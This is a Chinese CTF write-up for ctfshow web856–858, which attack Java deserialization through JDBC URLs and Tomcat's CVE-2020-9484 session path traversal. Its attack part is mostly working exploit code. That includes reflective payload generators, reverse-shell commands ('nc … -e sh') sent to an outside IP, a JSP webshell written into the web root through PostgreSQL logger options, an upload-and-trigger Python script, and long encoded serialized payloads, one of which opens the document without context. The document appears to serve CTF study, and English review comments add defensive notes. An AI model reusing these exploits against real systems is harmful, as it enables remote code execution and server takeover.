%6d%45%76%62%47%46%75%5a%79%39%53%64%57%35%30%61%57%31%6c%4f%77%77%41%4c%41%41%74%43%67%41%72%41%43%34%42%41%47%46%69%59%58%4e%6f%49%43%31%6a%49%48%74%6c%59%32%68%76%4c%46%6c%74%52%6e%70%68%51%30%46%30%59%56%4e%42%4b%30%70%70%51%58%5a%61%52%31%59%79%54%44%4e%53%61%6d%4e%44%4f%48%68%4e%61%6c%46%31%54%57%70%4a%65%55%78%71%52%58%70%4f%61%54%52%36%54%58%6b%34%65%45%31%36%54%54%4e%4a%52%45%45%72%53%6d%70%46%50%58%31%38%65%32%4a%68%63%32%55%32%4e%43%77%74%5a%48%31%38%65%32%4a%68%63%32%67%73%4c%57%6c%39%43%41%41%77%41%51%41%45%5a%58%68%6c%59%77%45%41%4a%79%6
8%4d%61%6d%46%32%59%53%39%73%59%57%35%6e%4c%31%4e%30%63%6d%6c%75%5a%7a%73%70%54%47%70%68%64%6d%45%76%62%47%46%75%5a%79%39%51%63%6d%39%6a%5a%58%4e%7a%4f%77%77%41%4d%67%41%7a%43%67%41%72%41%44%51%42%41%41%31%54%64%47%46%6a%61%30%31%68%63%46%52%68%59%6d%78%6c%41%51%41%66%65%58%4e%76%63%32%56%79%61%57%46%73%4c%31%42%33%62%6d%56%79%4d%54%45%30%4e%44%63%78%4d%6a%51%35%4d%7a%41%32%4d%54%45%34%4d%67%45%41%49%55%78%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%55%48%64%75%5a%58%49%78%4d%54%51%30%4e%7a%45%79%4e%44%6b%7a%4d%44%59%78%4d%54%67%79%4f%77%41%68%41%41%49%41%41%77%41%42%41%41%51%41%41%51%41%61%41%41%55%41%42%67%41%42%41%41%63%41%41%41%41%43%41%41%67%41%42%41%41%42%41%41%6f%41%43%77%41%42%41%41%77%41%41%41%41%76%41%41%45%41%41%51%41%41%41%41%55%71%74%77%41%42%73%51%41%41%41%41%49%41%44%51%41%41%41%41%59%41%41%51%41%41%41%43%38%41%44%67%41%41%41%41%77%41%41%51%41%41%41%41%55%41%44%77%41%34%41%41%41%41%41%51%41%54%41%42%51%41%41%67%41%4d%41%41%41%41%50%77%41%41%41%41%4d%41%41%41%41%42%73%51%41%41%41%41%49%41%44%51%41%41%41%41%59%41%41%51%41%41%41%44%51%41%44%67%41%41%41%43%41%41%41%77%41%41%41%41%45%41%44%77%41%34%41%41%41%41%41%41%41%42%41%42%55%41%46%67%41%42%41%41%41%41%41%51%41%58%41%42%67%41%41%67%41%5a%41%41%41%41%42%41%41%42%41%42%6f%41%41%51%41%54%41%42%73%41%41%67%41%4d%41%41%41%41%53%51%41%41%41%41%51%41%41%41%41%42%73%51%41%41%41%41%49%41%44%51%41%41%41%41%59%41%41%51%41%41%41%44%67%41%44%67%41%41%41%43%6f%41%42%41%41%41%41%41%45%41%44%77%41%34%41%41%41%41%41%41%41%42%41%42%55%41%46%67%41%42%41%41%41%41%41%51%41%63%41%42%30%41%41%67%41%41%41%41%45%41%48%67%41%66%41%41%4d%41%47%51%41%41%41%41%51%41%41%51%41%61%41%41%67%41%4b%51%41%4c%41%41%45%41%44%41%41%41%41%43%51%41%41%77%41%43%41%41%41%41%44%36%63%41%41%77%46%4d%75%41%41%76%45%6a%47%32%41%44%56%58%73%51%41%41%41%41%45%41%4e%67%41%41%41%41%4d%41%41%51%4d%41%41%67%41%67%41%41%41%41%41%67%41%68%41%42%45%41%41%41%41%4b%41%41%45%41%41%67%41%6a%41%42%41%41%43%58%56%78%41%48%34%41%49%77%41%41%41%64%54%4b%2f%72%71%2b%41%
41%41%41%4d%67%41%62%43%67%41%44%41%42%55%48%41%42%63%48%41%42%67%48%41%42%6b%42%41%42%42%7a%5a%58%4a%70%59%57%78%57%5a%58%4a%7a%61%57%39%75%56%55%6c%45%41%51%41%42%53%67%45%41%44%55%4e%76%62%6e%4e%30%59%57%35%30%56%6d%46%73%64%57%55%46%63%65%5a%70%37%6a%78%74%52%78%67%42%41%41%59%38%61%57%35%70%64%44%34%42%41%41%4d%6f%4b%56%59%42%41%41%52%44%62%32%52%6c%41%51%41%50%54%47%6c%75%5a%55%35%31%62%57%4a%6c%63%6c%52%68%59%6d%78%6c%41%51%41%53%54%47%39%6a%59%57%78%57%59%58%4a%70%59%57%4a%73%5a%56%52%68%59%6d%78%6c%41%51%41%45%64%47%68%70%63%77%45%41%41%30%5a%76%62%77%45%41%44%45%6c%75%62%6d%56%79%51%32%78%68%63%33%4e%6c%63%77%45%41%4a%55%78%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%63%47%46%35%62%47%39%68%5a%48%4d%76%64%58%52%70%62%43%39%48%59%57%52%6e%5a%58%52%7a%4a%45%5a%76%62%7a%73%42%41%41%70%54%62%33%56%79%59%32%56%47%61%57%78%6c%41%51%41%4d%52%32%46%6b%5a%32%56%30%63%79%35%71%59%58%5a%68%44%41%41%4b%41%41%73%48%41%42%6f%42%41%43%4e%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%63%47%46%35%62%47%39%68%5a%48%4d%76%64%58%52%70%62%43%39%48%59%57%52%6e%5a%58%52%7a%4a%45%5a%76%62%77%45%41%45%47%70%68%64%6d%45%76%62%47%46%75%5a%79%39%50%59%6d%70%6c%59%33%51%42%41%42%52%71%59%58%5a%68%4c%32%6c%76%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%57%4a%73%5a%51%45%41%48%33%6c%7a%62%33%4e%6c%63%6d%6c%68%62%43%39%77%59%58%6c%73%62%32%46%6b%63%79%39%31%64%47%6c%73%4c%30%64%68%5a%47%64%6c%64%48%4d%41%49%51%41%43%41%41%4d%41%41%51%41%45%41%41%45%41%47%67%41%46%41%41%59%41%41%51%41%48%41%41%41%41%41%67%41%49%41%41%45%41%41%51%41%4b%41%41%73%41%41%51%41%4d%41%41%41%41%4c%77%41%42%41%41%45%41%41%41%41%46%4b%72%63%41%41%62%45%41%41%41%41%43%41%41%30%41%41%41%41%47%41%41%45%41%41%41%41%38%41%41%34%41%41%41%41%4d%41%41%45%41%41%41%41%46%41%41%38%41%45%67%41%41%41%41%49%41%45%77%41%41%41%41%49%41%46%41%41%52%41%41%41%41%43%67%41%42%41%41%49%41%46%67%41%51%41%41%6c%77%64%41%41%45%55%48%64%75%63%6e%42%33%41%51%42%34%64%58%49%41%45%6c%74%4d%61%6d%46%32%59%53%35%73%59%57%35%6e%4c%6b%4e%73%59%58%4e%7a%4f%36%73%57
%31%36%37%4c%7a%56%71%5a%41%67%41%41%65%48%41%41%41%41%41%42%64%6e%49%41%48%57%70%68%64%6d%46%34%4c%6e%68%74%62%43%35%30%63%6d%46%75%63%32%5a%76%63%6d%30%75%56%47%56%74%63%47%78%68%64%47%56%7a%41%41%41%41%41%41%41%41%41%41%41%41%41%41%42%34%63%48%4e%79%41%42%46%71%59%58%5a%68%4c%6e%56%30%61%57%77%75%53%47%46%7a%61%45%31%68%63%41%55%48%32%73%48%44%46%6d%44%52%41%77%41%43%52%67%41%4b%62%47%39%68%5a%45%5a%68%59%33%52%76%63%6b%6b%41%43%58%52%6f%63%6d%56%7a%61%47%39%73%5a%48%68%77%50%30%41%41%41%41%41%41%41%41%42%33%43%41%41%41%41%42%41%41%41%41%41%41%65%48%68%32%63%67%41%53%61%6d%46%32%59%53%35%73%59%57%35%6e%4c%6b%39%32%5a%58%4a%79%61%57%52%6c%41%41%41%41%41%41%41%41%41%41%41%41%41%41%42%34%63%48%45%41%66%67%41%75

web856

考察JDBC反序列化,并给了User类和Connection类代码

Connection类源码如下:

  1. package com.ctfshow.entity;
  2. import java.io.IOException;
  3. import java.io.ObjectInputStream;
  4. import java.io.Serializable;
  5. import java.sql.DriverManager;
  6. import java.sql.SQLException;
  7. import java.util.Objects;
  /**
   * Serializable holder for database connection settings (driver, schema, host, port, user,
   * database), as handed out by the web856 exercise.
   *
   * <p>NOTE(review): {@code readObject} has a network side effect. It runs while an instance is
   * being deserialized and opens a JDBC connection to a URL concatenated from values taken out of
   * the serialized stream, so whoever supplies the stream chooses the host, the port and the
   * connection properties. A class like this must only be deserialized from trusted data, or
   * behind an allow-listing {@code java.io.ObjectInputFilter}; the safer design is to keep
   * {@code readObject} free of side effects and to connect later from validated settings.
   */
  public class Connection implements Serializable {
      private static final long serialVersionUID = 2807147458202078901L;
      // Not consulted by readObject, which hard-codes the MySQL driver class name.
      private String driver;
      private String schema;
      private String host;
      private int port;
      private User user;
      private String database;

      /** Returns the configured driver class name. */
      public String getDriver() {
          return driver;
      }

      /** Sets the driver class name. */
      public void setDriver(String driver) {
          this.driver = driver;
      }

      /** Returns the URL scheme part (readObject defaults it to "jdbc:mysql"). */
      public String getSchema() {
          return schema;
      }

      /** Sets the URL scheme part. */
      public void setSchema(String schema) {
          this.schema = schema;
      }

      /** Sets the port; the class declares no matching getter. */
      public void setPort(int port) {
          this.port = port;
      }

      /** Returns the host name or address. */
      public String getHost() {
          return host;
      }

      /** Sets the host name or address. */
      public void setHost(String host) {
          this.host = host;
      }

      /** Returns the user whose name is sent with the connection. */
      public User getUser() {
          return user;
      }

      /** Sets the user. */
      public void setUser(User user) {
          this.user = user;
      }

      /** Returns the database value (readObject places it in the URL's query part). */
      public String getDatabase() {
          return database;
      }

      /** Sets the database value. */
      public void setDatabase(String database) {
          this.database = database;
      }

      /**
       * Custom deserialization hook: loads the MySQL driver, reads the serialized field values
       * and immediately opens a JDBC connection built from them.
       *
       * @param in stream the instance is being read from
       * @throws IOException if reading the fields fails
       * @throws ClassNotFoundException if the driver class or a serialized class is missing
       * @throws SQLException if the connection attempt fails
       */
      private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException, SQLException {
          Class.forName("com.mysql.jdbc.Driver");
          // readFields() exposes the stream's values by name. Nothing below assigns them to this
          // instance's fields; the locals shadow the fields of the same name.
          ObjectInputStream.GetField gf = in.readFields();
          // Each default is used only when the stream carries no value for that field, so the
          // defaults do not constrain a stream that does set the field.
          String host = (String) gf.get("host", "127.0.0.1");
          int port = (int) gf.get("port",3306);
          User user = (User) gf.get("user",new User("root","root"));
          String database = (String) gf.get("database", "ctfshow");
          String schema = (String) gf.get("schema", "jdbc:mysql");
          // NOTE(review): every part of this URL comes from the stream without validation.
          // `database` lands directly after "/?", i.e. in the position of the connection
          // properties, so it can carry arbitrary key=value options for the driver.
          // Hardening: validate host/port against an allow-list, pass options through a
          // java.util.Properties object instead of string concatenation, and do not connect
          // during deserialization at all.
          // The returned connection is discarded and therefore never closed; a stream that
          // carries user = null would fail here with a NullPointerException.
          DriverManager.getConnection( schema+"://"+host+":"+port+"/?"+database+"&user="+user.getUsername());
      }

      /**
       * Compares host, port, user and database; {@code driver} and {@code schema} are not part
       * of the comparison.
       */
      @Override
      public boolean equals(Object o) {
          if (this == o) return true;
          if (!(o instanceof Connection)) return false;
          Connection that = (Connection) o;
          // Objects.equals on the int ports boxes both values before comparing.
          return Objects.equals(host, that.host) && Objects.equals(port, that.port) && Objects.equals(user, that.user) && Objects.equals(database, that.database);
      }

      /** Hashes the same four fields that {@link #equals(Object)} compares. */
      @Override
      public int hashCode() {
          return Objects.hash(host, port, user, database);
      }
  }

User类源码如下:

  1. package com.ctfshow.entity;
  import java.io.*;
  import java.util.Objects;
  3. public class User implements Serializable {
  4. private static final long serialVersionUID = -7205095498817563965L;
  5. private String username;
  6. private String password;
  7. public User(String username, String password) {
  8. this.username = username;
  9. this.password = password;
  10. }
  11. public String getUsername() {
  12. return username;
  13. }
  14. public void setUsername(String username) {
  15. this.username = username;
  16. }
  17. public String getPassword() {
  18. return password;
  19. }
  20. public void setPassword(String password) {
  21. this.password = password;
  22. }
  23. @Override
  24. public boolean equals(Object o) {
  25. if (this == o) return true;
  26. if (!(o instanceof User)) return false;
  27. User user = (User) o;
  28. return this.hashCode() == user.hashCode();
  29. }
  30. @Override
  31. public int hashCode() {
  32. return username.hashCode()+password.hashCode();
  33. }
  34. }

构造exp:

  1. package com.ctfshow.entity;
  2. import java.io.ByteArrayOutputStream;
  3. import java.io.IOException;
  4. import java.io.ObjectOutput;
  5. import java.io.ObjectOutputStream;
  6. import java.lang.reflect.Field;
  7. import java.util.Base64;
  /**
   * Proof-of-concept generator from the web856 write-up: fills a {@code Connection} through
   * reflection, serializes it and prints the Base64 form.
   *
   * <p>Defender's reading: each value set here is later read by the exercise's
   * {@code Connection.readObject} on the deserializing side and concatenated into a JDBC URL.
   * The underlying weaknesses are deserialization of untrusted input and a JDBC URL built from
   * unvalidated parts. Useful signals are outbound database connections from an application
   * server to unexpected hosts and JDBC URLs that contain {@code autoDeserialize=true}.
   */
  public class exp {
      /**
       * Builds the object and prints its serialized form.
       *
       * @param args unused
       */
      public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException {
          Connection connection = new Connection();
          Class<? extends Connection> aClass = connection.getClass();
          // host and port become the address the deserializing process connects to.
          Field host = aClass.getDeclaredField("host");
          host.setAccessible(true);
          host.set(connection,"124.222.136.33");
          Field port = aClass.getDeclaredField("port");
          port.setAccessible(true);
          port.set(connection,3306);
          // Only getUsername() reaches the URL (as "&user=...").
          // NOTE(review): the name looks like a gadget label followed by a command; how it is
          // interpreted depends on the remote server, which the page does not show.
          Field user = aClass.getDeclaredField("user");
          user.setAccessible(true);
          user.set(connection,new User("yso_CommonsCollections4_nc 124.222.136.33 1337 -e sh","123456"));
          Field schema = aClass.getDeclaredField("schema");
          schema.setAccessible(true);
          schema.set(connection,"jdbc:mysql");
          // Connection.readObject appends this text right after "/?", so it is parsed as
          // connection properties rather than as a database name. autoDeserialize tells MySQL
          // Connector/J to de-serialize objects found in result data, which is why connecting to
          // a server one does not control must never be combined with that option.
          Field database = aClass.getDeclaredField("database");
          database.setAccessible(true);
          database.set(connection,"detectCustomCollations=true&autoDeserialize=true");
          serialize(connection);
      }

      /**
       * Serializes {@code obj} in memory and prints the bytes Base64-encoded on stdout.
       *
       * <p>NOTE(review): {@code IOException} is listed twice in the throws clause and a stray
       * {@code ;} follows the closing brace; both are harmless.
       *
       * @param obj object to serialize
       * @throws IOException if serialization fails
       */
      public static void serialize(Object obj) throws IOException, IOException {
          ByteArrayOutputStream data =new ByteArrayOutputStream();
          ObjectOutput oos =new ObjectOutputStream(data);
          oos.writeObject(obj);
          oos.flush();
          oos.close();
          System.out.println(Base64.getEncoder().encodeToString(data.toByteArray()));
      };
  }

最终payload:

ctfshow=%72%4f%30%41%42%58%4e%79%41%42%31%6a%62%32%30%75%59%33%52%6d%63%32%68%76%64%79%35%6c%62%6e%52%70%64%48%6b%75%51%32%39%75%62%6d%56%6a%64%47%6c%76%62%69%62%30%2f%62%32%47%52%6f%36%31%41%67%41%47%53%51%41%45%63%47%39%79%64%45%77%41%43%47%52%68%64%47%46%69%59%58%4e%6c%64%41%41%53%54%47%70%68%64%6d%45%76%62%47%46%75%5a%79%39%54%64%48%4a%70%62%6d%63%37%54%41%41%47%5a%48%4a%70%64%6d%56%79%63%51%42%2b%41%41%46%4d%41%41%52%6f%62%33%4e%30%63%51%42%2b%41%41%46%4d%41%41%5a%7a%59%32%68%6c%62%57%46%78%41%48%34%41%41%55%77%41%42%48%56%7a%5a%58%4a%30%41%42%6c%4d%59%32%39%74%4c%32%4e%30%5a%6e%4e%6f%62%33%63%76%5a%57%35%30%61%58%52%35%4c%31%56%7a%5a%58%49%37%65%48%41%41%41%41%7a%71%64%41%41%77%5a%47%56%30%5a%57%4e%30%51%33%56%7a%64%47%39%74%51%32%39%73%62%47%46%30%61%57%39%75%63%7a%31%30%63%6e%56%6c%4a%6d%46%31%64%47%39%45%5a%58%4e%6c%63%6d%6c%68%62%47%6c%36%5a%54%31%30%63%6e%56%6c%63%48%51%41%44%6a%45%79%4e%43%34%79%4d%6a%49%75%4d%54%4d%32%4c%6a%4d%7a%64%41%41%4b%61%6d%52%69%59%7a%70%74%65%58%4e%78%62%48%4e%79%41%42%64%6a%62%32%30%75%59%33%52%6d%63%32%68%76%64%79%35%6c%62%6e%52%70%64%48%6b%75%56%58%4e%6c%63%70%77%43%57%39%46%73%4e%70%4c%44%41%67%41%43%54%41%41%49%63%47%46%7a%63%33%64%76%63%6d%52%78%41%48%34%41%41%55%77%41%43%48%56%7a%5a%58%4a%75%59%57%31%6c%63%51%42%2b%41%41%46%34%63%48%51%41%42%6a%45%79%4d%7a%51%31%4e%6e%51%41%4e%48%6c%7a%62%31%39%44%62%32%31%74%62%32%35%7a%51%32%39%73%62%47%56%6a%64%47%6c%76%62%6e%4d%30%58%32%35%6a%49%44%45%79%4e%43%34%79%4d%6a%49%75%4d%54%4d%32%4c%6a%4d%7a%49%44%45%7a%4d%7a%63%67%4c%57%55%67%63%32%67%3d

成功反弹shell

web857

依然是JDBC反序列化,但数据库换成了pgsql

奇安信攻防社区-PostgreSQL JDBC Driver RCE(CVE-2022-21724)与任意文件写入漏洞利用与分析

因为Connection类设置了默认的ip和端口,不符合文章里直接RCE的特征,所以考虑任意文件写入

 

 exp:

  1. package com.ctfshow.entity;
  2. import java.io.ByteArrayOutputStream;
  3. import java.io.IOException;
  4. import java.io.ObjectOutput;
  5. import java.io.ObjectOutputStream;
  6. import java.lang.reflect.Field;
  7. import java.util.Base64;
  /**
   * Proof-of-concept generator from the web857 write-up: same shape as the web856 one, but the
   * scheme is {@code jdbc:postgresql} and the {@code database} value carries PostgreSQL JDBC
   * logging properties.
   *
   * <p>Defender's reading: the file write happens because a JDBC URL is assembled from
   * untrusted, deserialized values. Keep the PostgreSQL driver patched (the page links an
   * analysis of CVE-2022-21724 and the related file-write issue), never build connection URLs
   * from untrusted input, and watch for JDBC URLs containing {@code loggerFile=} as well as for
   * unexpected {@code .jsp} files appearing under the web root.
   */
  public class exp {
      /**
       * Builds the object and prints its serialized form.
       *
       * @param args unused
       */
      public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException {
          Connection connection = new Connection();
          Class<? extends Connection> aClass = connection.getClass();
          // NOTE(review): the Connection listing printed for web856 never reads `driver` in
          // readObject; the web857 variant of the class is not shown on the page, so whether
          // this value is used cannot be confirmed from here.
          Field driver = aClass.getDeclaredField("driver");
          driver.setAccessible(true);
          driver.set(connection,"org.postgresql.Driver");
          Field host = aClass.getDeclaredField("host");
          host.setAccessible(true);
          host.set(connection,"124.222.136.33");
          Field port = aClass.getDeclaredField("port");
          port.setAccessible(true);
          port.set(connection,3306);
          Field user = aClass.getDeclaredField("user");
          user.setAccessible(true);
          user.set(connection,new User("Jdk7u21","123456"));
          Field schema = aClass.getDeclaredField("schema");
          schema.setAccessible(true);
          schema.set(connection,"jdbc:postgresql");
          // Placed in the query part of the URL by Connection.readObject, so these are driver
          // properties, not a database name: loggerLevel/loggerFile direct the driver's debug log
          // to a path under the web root, and the trailing JSP text is the content the write-up
          // wants to end up in that file.
          Field database = aClass.getDeclaredField("database");
          database.setAccessible(true);
          database.set(connection,"password=123456&loggerLevel=debug&loggerFile=../webapps/ROOT/yjh.jsp&<%Runtime.getRuntime().exec(request.getParameter(\"i\"));%>");
          serialize(connection);
      }

      /**
       * Serializes {@code obj} in memory and prints the bytes Base64-encoded on stdout.
       *
       * <p>NOTE(review): {@code IOException} is listed twice in the throws clause and a stray
       * {@code ;} follows the closing brace; both are harmless.
       *
       * @param obj object to serialize
       * @throws IOException if serialization fails
       */
      public static void serialize(Object obj) throws IOException, IOException {
          ByteArrayOutputStream data =new ByteArrayOutputStream();
          ObjectOutput oos =new ObjectOutputStream(data);
          oos.writeObject(obj);
          oos.flush();
          oos.close();
          System.out.println(Base64.getEncoder().encodeToString(data.toByteArray()));
      };
  }

关于目录

Tomcat 的 web 目录结构通常如下所示:

  1. webapps 目录

    • ROOT:默认的 Web 应用程序根目录,对应 URL 中的 /
    • 其他应用程序目录:每个独立的 Web 应用程序一般会被放置在单独的目录中,例如 myapp、anotherapp 等。
  2. Web 应用程序目录结构

    • WEB-INF 目录
      • web.xml:Web 应用程序的部署描述文件,配置 Servlet、Filter、Listener 等。
      • classes 目录:存放编译后的 Java 类文件(.class 文件)和资源文件。
      • lib 目录:存放 Web 应用程序依赖的第三方库(JAR 文件)。
    • 静态资源目录:存放 HTML、CSS、JavaScript、图片等静态资源文件。
    • JSP 文件目录:存放 JSP 文件。
  3. 示例目录结构(以 myapp 为例):

  1. /webapps
  2. ├── myapp
  3. │ ├── WEB-INF
  4. │ │ ├── web.xml
  5. │ │ ├── classes
  6. │ │ │ └── com
  7. │ │ │ └── example
  8. │ │ │ └── MyClass.class
  9. │ │ ├── lib
  10. │ │ │ └── library.jar
  11. │ ├── index.html
  12. │ ├── styles.css
  13. │ ├── script.js
  14. │ ├── page.jsp

payload:

ctfshow=%72%4f%30%41%42%58%4e%79%41%42%31%6a%62%32%30%75%59%33%52%6d%63%32%68%76%64%79%35%6c%62%6e%52%70%64%48%6b%75%51%32%39%75%62%6d%56%6a%64%47%6c%76%62%69%62%30%2f%62%32%47%52%6f%36%31%41%67%41%47%53%51%41%45%63%47%39%79%64%45%77%41%43%47%52%68%64%47%46%69%59%58%4e%6c%64%41%41%53%54%47%70%68%64%6d%45%76%62%47%46%75%5a%79%39%54%64%48%4a%70%62%6d%63%37%54%41%41%47%5a%48%4a%70%64%6d%56%79%63%51%42%2b%41%41%46%4d%41%41%52%6f%62%33%4e%30%63%51%42%2b%41%41%46%4d%41%41%5a%7a%59%32%68%6c%62%57%46%78%41%48%34%41%41%55%77%41%42%48%56%7a%5a%58%4a%30%41%42%6c%4d%59%32%39%74%4c%32%4e%30%5a%6e%4e%6f%62%33%63%76%5a%57%35%30%61%58%52%35%4c%31%56%7a%5a%58%49%37%65%48%41%41%41%41%7a%71%64%41%42%2b%63%47%46%7a%63%33%64%76%63%6d%51%39%4d%54%49%7a%4e%44%55%32%4a%6d%78%76%5a%32%64%6c%63%6b%78%6c%64%6d%56%73%50%57%52%6c%59%6e%56%6e%4a%6d%78%76%5a%32%64%6c%63%6b%5a%70%62%47%55%39%4c%69%34%76%64%32%56%69%59%58%42%77%63%79%39%53%54%30%39%55%4c%33%6c%71%61%43%35%71%63%33%41%6d%50%43%56%53%64%57%35%30%61%57%31%6c%4c%6d%64%6c%64%46%4a%31%62%6e%52%70%62%57%55%6f%4b%53%35%6c%65%47%56%6a%4b%48%4a%6c%63%58%56%6c%63%33%51%75%5a%32%56%30%55%47%46%79%59%57%31%6c%64%47%56%79%4b%43%4a%70%49%69%6b%70%4f%79%55%2b%64%41%41%56%62%33%4a%6e%4c%6e%42%76%63%33%52%6e%63%6d%56%7a%63%57%77%75%52%48%4a%70%64%6d%56%79%64%41%41%4f%4d%54%49%30%4c%6a%49%79%4d%69%34%78%4d%7a%59%75%4d%7a%4e%30%41%41%39%71%5a%47%4a%6a%4f%6e%42%76%63%33%52%6e%63%6d%56%7a%63%57%78%7a%63%67%41%58%59%32%39%74%4c%6d%4e%30%5a%6e%4e%6f%62%33%63%75%5a%57%35%30%61%58%52%35%4c%6c%56%7a%5a%58%4b%63%41%6c%76%52%62%44%61%53%77%77%49%41%41%6b%77%41%43%48%42%68%63%33%4e%33%62%33%4a%6b%63%51%42%2b%41%41%46%4d%41%41%68%31%63%32%56%79%62%6d%46%74%5a%58%45%41%66%67%41%42%65%48%42%30%41%41%59%78%4d%6a%4d%30%4e%54%5a%30%41%41%64%4b%5a%47%73%33%64%54%49%78

先成功写马 

再访问/yjh.php,用nc反弹shell

成功反弹

web858

考察tomcat的session反序列化

Tomcat Session(CVE-2020-9484)反序列化 - 简书

 先随便上传一个文件看看上传路径

抓包看到调用的接口

看下User类

  1. package com.ctfshow.entity;
  2. import java.io.IOException;
  3. import java.io.ObjectInputStream;
  4. import java.io.Serializable;
  /**
   * Serializable user record from the web858 exercise.
   *
   * <p>NOTE(review): this class is a ready-made deserialization gadget. {@code readObject}
   * passes the deserialized {@code username} to {@code Runtime.exec}, so anyone who can get
   * bytes deserialized as this class runs a command in the deserializing process. Deserialization
   * hooks should restore state only; a class like this must be kept away from untrusted streams
   * (for example with an allow-listing {@code java.io.ObjectInputFilter}) or, better, have the
   * side effect removed.
   */
  public class User implements Serializable {
      private static final long serialVersionUID = -3254536114659397781L;
      private String username;
      private String password;

      /** Returns the user name. */
      public String getUsername() {
          return username;
      }

      /** Sets the user name. */
      public void setUsername(String username) {
          this.username = username;
      }

      /** Returns the password. */
      public String getPassword() {
          return password;
      }

      /** Sets the password. */
      public void setPassword(String password) {
          this.password = password;
      }

      /**
       * Custom deserialization hook: restores the fields, then executes {@code username} as an
       * operating-system command.
       *
       * @param in stream the instance is being read from
       * @throws IOException if reading fails or the process cannot be started
       * @throws ClassNotFoundException if a serialized class is missing
       */
      private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
          in.defaultReadObject();
          // The command string comes straight from the serialized data; the returned Process is
          // discarded.
          Runtime.getRuntime().exec(this.username);
      }
  }

exp:

  1. package com.ctfshow.entity;
  2. import java.io.*;
  3. import java.lang.reflect.Field;
  /**
   * Proof-of-concept generator from the web858 write-up: writes a serialized {@code User} to the
   * file {@code exp.session}.
   *
   * <p>Defender's reading: the {@code username} set here is what the exercise's
   * {@code User.readObject} hands to {@code Runtime.exec} when the file is deserialized, so the
   * fix belongs in that class and in what the server agrees to deserialize, not in input
   * filtering of the command text.
   */
  public class exp {
      /**
       * Builds the object and writes its serialized form to {@code exp.session}.
       *
       * @param args unused
       */
      public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, InstantiationException, IOException, ClassNotFoundException {
          Class userClass = User.class;
          // Create a User instance.
          User user = (User)userClass.newInstance();
          // Look up the username field.
          Field usernameField = userClass.getDeclaredField("username");
          // Make the private field accessible.
          usernameField.setAccessible(true);
          // Set the username field.
          usernameField.set(user,"nc 124.222.136.33 1337 -e /bin/sh");
          // Open a file output stream.
          FileOutputStream fos = new FileOutputStream("exp.session");
          // Wrap it in an object output stream.
          ObjectOutputStream oos = new ObjectOutputStream(fos);
          // Serialize the object.
          // NOTE(review): neither stream is flushed or closed explicitly before main returns.
          oos.writeObject(user);
      }
  }
  1. import requests
  # Base URL of the exercise instance used in the write-up.
  url = "http://dfdbd0a0-732e-4512-9113-29d786ce39fb.challenge.ctf.show"
  # Upload the serialized object as exp.session, labelled with the content type image/png.
  # NOTE(review): the handle returned by open() is never closed explicitly.
  files = {'file': ('exp.session', open('exp.session','rb').read(), 'image/png')}
  r = requests.post(url+"/file/upload", files=files)
  # The session id is a relative path with "../" segments that ends in the upload directory;
  # the page attributes the resulting deserialization to CVE-2020-9484.
  # Defender's view: a session id containing path separators is never legitimate, so it can be
  # rejected at the edge and alerted on in access logs. Keeping Tomcat patched and not
  # persisting sessions to a file store that users can write into remove the precondition.
  r2 = requests.get(url, cookies={
      'JSESSIONID': '../../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/upload/exp'})

监听端口,成功反弹shell
